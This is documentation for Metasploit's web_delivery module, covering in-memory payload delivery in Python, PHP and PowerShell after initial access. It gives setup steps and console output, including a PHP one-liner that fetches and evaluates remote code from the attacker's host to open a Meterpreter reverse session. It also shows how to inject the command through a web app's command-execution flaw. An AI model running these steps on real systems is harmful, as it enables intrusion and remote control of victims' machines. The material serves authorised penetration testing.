As a web server, web_delivery provides a great way to deliver a payload during post exploitation, with the intention to stay stealthy because the payload does not touch the disk. Currently, web_delivery supports three different languages for delivery: Python, PHP, and Powershell. You should be able to tell which one you can use based on the target environment you are in. For example: if you have gained access through a PHP application, then it's safe to assume you can use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to say the target supports Powershell. ## Verification Steps To be able to use web_delivery, you must gain access to the target machine first, wit the ability to execute either the Python, or PHP, or Powershell interpreter. At that point, you would use web_delivery similar to the following example: 1. Start msfconsole 2. Do: ```use exploit/multi/script/web_delivery``` 3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options) 4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target) 5. Do: ```set LHOST IP``` (The IP the payload should connect back to) 6. Do: ```run``` 7. At this point, a handler is up for that payload. And the module should instruct you to execute a command. 8. Copy the command. Depending on your pentesting scenario, typically you can either inject the command and get code execution, or run it from the target's shell, and get a session: ``` msf exploit(web_delivery) > run [*] Exploit running as background job. [*] Started reverse TCP handler on 172.16.23.1:4444 msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9 [*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9 [*] Server started. [*] Run the following command on the target machine: php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));" [*] Delivering Payload [*] Sending stage (33684 bytes) to 172.16.23.134 [*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600 ``` ## Targets **Python** Python is a fairly popular language, especially on unix-based systems. For example, it comes with Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3. **PHP** PHP is a fairly popular language for web servers, especially Apache. **Powershell/win** Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 are the first Windows versions to come with Powershell by default, and not older systems. ## Scenarios **Against a compromised web application** web_delivery would work nicely for a web application with a command execution vulnerability. One way to approach this would be: 1. Start exploit/multi/script/web_delivery 2. Use Burp Suite to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution. 3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session. **Shell upgrade** web_delivery is also useful to upgrade a shell type payload to a meterpreter one. Here's how that can be done: 1. Start exploit/multi/script/web_delivery that generates/ 2. On msfconsole, interact with the shell, and copy/pate the command. 3. You should get a meterpreter session.